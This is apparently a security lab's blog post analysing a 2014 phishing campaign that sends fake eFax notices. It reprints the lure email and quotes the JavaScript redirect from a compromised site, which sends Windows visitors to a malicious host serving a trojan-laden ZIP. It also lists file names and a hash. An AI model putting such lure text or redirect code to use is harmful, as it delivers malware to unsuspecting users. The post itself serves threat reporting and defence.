Fake email eFax message contains URL that leads to malicious ZIP archive


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “eFax message from “02086164497” – 1 page(s), Caller-ID: 208-616-4497″.

This email is send from the spoofed address “eFax <message@inbound.*******>” and has the following body:

Fax Message [Caller-ID: 208-616-4497]
You have received a 1 page fax at 2014-10-05 11:34:48 GMT.

* The reference number for this fax is lon2_did11-2974913177-8345459349-35.

Please visit https://www.efax.co.uk/myaccount/message/lon2_did11-2974913177-8345459349-35 to view this message in full.

Thank you for using the eFax service!

Screenshot of the email:

The embedded URL hxxp://lanuez.cl/wp-content/themes/cityhub/mess.html leads to a redirect page with the following script:

<script>(CR)(LF)
var·OSName="Unknown·OS";(CR)(LF)
if·(navigator.appVersion.indexOf("Win")!=-1)·OSName="Windows";(CR)(LF)
if·(navigator.appVersion.indexOf("Mac")!=-1)·OSName="MacOS";(CR)(LF)
if·(navigator.appVersion.indexOf("X11")!=-1)·OSName="UNIX";(CR)(LF)
if·(navigator.appVersion.indexOf("Linux")!=-1)·OSName="Linux";(CR)(LF)
var1=112;(CR)(LF)
var2=var1;(CR)(LF)
if(OSName=="Windows")·{location.replace("hxxp://200.59.14.44:8080/ord/ef.html");}else{location.replace("http://google.com/search?q=efax");}(CR)(LF)
</script>

This script clearly shows that it is targeting Windows users. In all other cases, you’re redirected towards Google with a search query on eFax. The site hxxp://200.59.14.44:8080/ord/ef.html shows us the following layout and allows us to download the malicious fax in ZIP format.

The downloaded ZIP file has the name FAX_20141008_1412786088_26.zip and contains the folder FAX_20141008_1412786088_26 with the 61 kB large file FAX_20141008_1412786088_26.exe. Numbers may vary in the file names.

The trojan is known as Malware.QVM20.Gen.

At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total so de not download any files from this host.

Use the Virus Total permalink for more detailed information.
SHA256: 3dd29684ab081569d4ce723b16f22b7bcc8301df2657177802bc71c7a375307e